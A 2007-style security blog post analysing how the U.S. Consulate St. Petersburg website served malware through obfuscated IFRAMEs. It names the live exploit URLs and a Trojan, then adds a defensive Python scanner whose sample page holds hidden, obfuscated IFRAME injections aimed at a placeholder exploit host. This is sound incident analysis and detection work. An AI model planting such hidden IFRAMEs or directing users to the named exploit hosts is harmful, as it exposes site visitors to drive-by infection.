If that's not a pattern and good timing, it's a malicious anomaly. On the 31st of August, 2007, Bank of India was serving malware courtesy of the Russian Business Network. This week, evidence that the U.S. Consulate in St. Petersburg, Russia was serving malware to its visitors proved to be true. The web site is now clean, but assessing the IFRAME-ed URLs used in the attack is still possible as they remain reachable. It's still unknown how long the IFRAMEs remained embedded at the Consulate's web site, or when they were cleaned, but the attack was still active on the 2nd of September, 2007, just two days after Bank of India's malware attack. It's also worth mentioning that, compared to the most recent malware embedded attacks, which had the IFRAMEs directly embedded within the page, in this one the IFRAME itself is obfuscated but the live exploit URL isn't.
Tipped by a third party, Sophos managed to locate the exact URL by deobfuscating the rather simple URL obfuscation, and Fraser Howard posted some interesting details at their blog:
"The purpose of the attacks is to infect victims with Trojans from the two attack sites. As discussed in a recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the Trojans highlights the need for good generic detection technology. A system to continuously monitor these files in order to maintain detection is essential. So, to answer the question of whether the U.S. Consulate General site was specifically targeted in this attack - my answer is no, probably not. The prevalence of other much smaller sites compromised in exactly the same way (in just seven days worth of data) suggests that the hackers just happened to have caught a big fish as they trawled for vulnerable servers. It just goes to show that security is important on all machines hosting both small and large websites."
We could greatly expand on those, as a matter of fact. The IFRAME used leads us to verymonkey.com/goof/index.php (188.8.131.52) and verymonkey.com/test/index.php, which exploits a modified MDAC exploit and aims to execute the following binary, Virus.Win32.Zapchast.DA:

Detection rate: 6/32 (18.75%)

Scanner            Signature date  Detection
AntiVir            2007.09.14      DR/Delphi.Gen
AVG                2007.09.14      Obfustat.NPJ
eSafe              2007.09.13      Suspicious Trojan/Worm
Ikarus             2007.09.14      Virus.Win32.Zapchast.DA
VirusBuster        2007.09.13      Trojan.Agent.JVF
Webwasher-Gateway  2007.09.14      Trojan.Delphi.Gen

File size: 28672 bytes
Is this obfuscated IFRAME-ing a fad or a trend? I think it's a trend: IFRAME-ing to a secondary domain that takes advantage of popular web malware exploitation techniques is already rated as suspicious by security vendors, and Google itself warns you that "this site may harm your computer", so the attackers obfuscate in order to buy time. Moreover, such obfuscations make it harder to assess, in an OSINT manner, how many sites and which ones exactly were victims of the attack. It gets even more interesting: the IP hosting verymonkey.com was historically used to host the banksoffscotland.co.uk scam web site in March this year. In case you wonder, it's not the RBN that's behind this malware embedded attack, but let's say it's a subsidiary of the RBN.
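The post only calls the Consulate's IFRAME obfuscation "rather simple" without showing it, so this added example (not code from the post or from Sophos) assumes the two most common simple JavaScript encodings of a written-out tag, unescape() and String.fromCharCode(), decodes them, and flags frames that point off-site or are zero-sized, the check a site operator would run over their own pages after an incident like this. The hostnames in the sample page are constructed placeholders.

```python
import re
from urllib.parse import urlparse, unquote

# Assumed obfuscations: unescape("%..") and String.fromCharCode(..) wrapping a written-out tag.
UNESCAPE_RE = re.compile(r'unescape\(\s*["\']([^"\']+)["\']\s*\)', re.I)
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d\s,]+)\)', re.I)
IFRAME_TAG_RE = re.compile(r'<iframe\b[^>]*>', re.I)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(r'\b(?:width|height)\s*=\s*["\']?0\b', re.I)

def decode_simple_obfuscation(html):
    """Expand unescape("%..") and String.fromCharCode(..) literals in place so that
    any IFRAME they would write at runtime becomes visible to a static scan."""
    html = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), html)
    return FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), html)

def find_suspicious_iframes(html, site_host):
    """Return every IFRAME whose target is off-site, noting whether the tag was
    only reachable after decoding and whether it is sized to be invisible."""
    decoded = decode_simple_obfuscation(html)
    findings = []
    for tag in IFRAME_TAG_RE.findall(decoded):
        src_match = SRC_RE.search(tag)
        if not src_match:
            continue
        src = src_match.group(1)
        host = urlparse(src if "://" in src else "http://" + src).hostname or ""
        if not host or host == site_host or host.endswith("." + site_host):
            continue  # relative or same-site frame: normal page structure
        flags = ["off-site"]
        if tag not in html:
            flags.append("obfuscated")  # the tag exists only after decoding
        if HIDDEN_RE.search(tag):
            flags.append("hidden")  # zero-sized frame, invisible to the visitor
        findings.append({"src": src, "host": host, "flags": flags})
    return findings

# Constructed sample page: one legitimate same-site frame, one IFRAME hidden behind
# unescape() and one behind String.fromCharCode(); all hostnames are placeholders.
FCC_IFRAME = "String.fromCharCode(" + ",".join(
    str(ord(c)) for c in "<iframe src=http://evil.example/test/index.php width=1 height=1>") + ")"
SAMPLE_HTML = f"""<html><body>
<iframe src="http://www.consulate.example/news/feed.html" width="400"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fevil.example%2Fgoof%2Findex.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"));</script>
<script>document.write({FCC_IFRAME});</script>
</body></html>"""
if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML, "consulate.example"):
        print(finding)
```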